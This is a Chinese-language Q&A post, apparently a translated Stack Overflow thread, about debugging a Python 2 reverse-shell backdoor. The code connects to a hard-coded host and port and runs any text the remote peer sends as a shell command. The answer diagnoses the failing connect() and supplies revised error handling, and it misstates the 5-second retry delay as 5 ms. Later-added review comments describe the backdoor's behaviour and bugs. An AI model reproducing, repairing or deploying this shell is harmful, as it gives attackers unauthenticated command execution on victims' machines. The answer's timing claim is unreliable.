(假设所有的缩进和空格都是正确的)
#! /usr/bin/env python
# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.
# Based on the Python connect back shell written by David Kennedy
# http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import socket
import subprocess
import sys
import time
# Remote endpoint that main() dials in its reconnect loop; both values are
# hard-coded, so changing the peer means editing the script.
HOST = '127.0.0.1'
PORT = 8080
# Module-level print: runs on import as well as on direct execution.
print "Starting Listener and Reverse Shell proccess."
def connect((host, port)):
    """Open a TCP connection to (host, port) and return the connected socket.

    Python 2 tuple-parameter syntax: the single positional argument is
    unpacked into host and port.  A socket.error raised by connect() is not
    handled here and propagates to the caller (main() catches it); in that
    case the socket object created above is never closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Okay #1"
    s.connect((host, port))  # raises socket.error if the peer is unreachable
    print "Accessing..."
    return s
def wait_for_command(s):
    """Read one chunk from s and act on it; return True when the socket died.

    Security note: any data the remote peer sends (other than the exact
    string "quit\n") is passed to subprocess.Popen with shell=True, i.e. the
    peer gets unauthenticated, unencrypted remote command execution on this
    host.  That is the purpose of this script (a reverse shell), not an
    accident, and it is why a process with this behaviour is treated as an
    indicator of compromise when found on a host.

    Returns:
        True  - recv() returned an empty string (peer closed the connection).
        False - a command was run.
    Does not return on "quit\n": the process exits via sys.exit(0).
    """
    data = s.recv(1024)  # at most 1024 bytes per call
    print "Phase three, completed"
    if data == "quit\n":
        s.close()
        sys.exit(0)
        print "Socket Closed. Unable to boot."  # unreachable: sys.exit() raises SystemExit
    # the socket died
    elif len(data)==0:
        return True
    else:
        # do shell command
        proc = subprocess.Popen(data, shell=True,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        # read output
        # NOTE(review): stdout is read to EOF before stderr is touched; if the
        # child fills the stderr pipe first, this read can block - confirm.
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # send output to attacker
        # NOTE(review): despite the comment above, nothing is written back to
        # s here; stdout_value is collected but never used.
        print "I think this worked..."
        return False
def main():
    """Reconnect loop: dial HOST:PORT, serve commands until the socket dies, retry.

    Every socket.error (including a failed connect()) is swallowed by the bare
    `pass`, so the loop gives no hint why it keeps restarting; the only
    observable symptom is the repeated "Okay #1" print from connect().  The
    loop never terminates on its own - the process ends only through the
    sys.exit(0) inside wait_for_command() or an uncaught exception.
    """
    while True:
        socked_died=False
        try:
            s=connect((HOST,PORT))
            while not socked_died:
                socked_died=wait_for_command(s)
            # NOTE(review): reached only when the inner loop ends normally; a
            # socket.error raised inside wait_for_command() skips this close().
            s.close()
        except socket.error:
            pass  # error is neither logged nor inspected; just retried
        time.sleep(5)  # seconds between attempts
if __name__ == "__main__":
    # main() never returns normally (its while True has no break/return), so
    # the process exit code comes from the sys.exit() calls reached inside it.
    sys.exit(main())
此代码一直循环,直到它显示“Okay#1”。它似乎没有转移到其他代码行。我自己首先尝试制作这种脚本,但一直都失败了所以我去了互联网寻求帮助。这段代码需要一段时间才能执行,因此我放置了打印脚本,以便我可以看到它是否正常工作。
答案 0 :(得分:0)
调用s.connect((host,port))
时,您的connect方法会抛出异常。它会先打印出“Okay#1”,然后在下一行抛出异常。因此,它会跳转到您的except socket.error
块并调用pass
。然后它睡了5ms然后重新尝试,结果完全相同。
你能找出socket.error是什么并记录下来吗?
也许你可以试试这个(这是基于这个link):
# Proposed replacement for the body of main(): the same reconnect loop, but a
# socket.error is reported and the process exits instead of retrying forever.
while True:
    socked_died=False
    try:
        s=connect((HOST,PORT))
        while not socked_died:
            socked_died=wait_for_command(s)
        s.close()
    # Python 2 syntax: the exception's args are unpacked into (value, message).
    # NOTE(review): this assumes every socket.error carries exactly two args;
    # one raised with a single argument would make the unpacking itself fail.
    except socket.error, (value,message):
        # NOTE(review): if connect() raised on the very first iteration, `s`
        # was never assigned and this `if s:` raises NameError before the
        # print below is reached.
        if s:
            s.close()
        print "Could not open socket: " + message
        sys.exit(1)
    time.sleep(5)